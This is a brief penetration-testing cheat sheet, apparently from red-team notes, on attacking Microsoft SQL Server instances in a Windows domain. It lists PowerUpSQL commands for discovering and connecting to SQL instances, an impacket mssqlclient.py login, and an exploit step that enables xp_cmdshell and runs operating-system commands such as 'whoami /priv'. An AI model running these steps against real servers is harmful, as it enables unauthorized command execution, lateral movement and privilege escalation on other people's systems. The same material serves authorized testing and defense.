Tags
AuthenticatedLateral MovementPrivilege Escalation
Identify
Import-Module .\PowerUpSQL.ps1
Get-SQLInstanceDomain
Connect - Windows
Get-SQLQuery -Verbose -Instance "host,port" -username "domain.local\\user" -password "password" -query 'Select @@version'
Connect - Linux
mssqlclient.py DOMAIN/USER@IP -windows-auth
Exploit
Run commands with xp_cmdshell
SQL> enable_xp_cmdshell
xp_cmdshell whoami /priv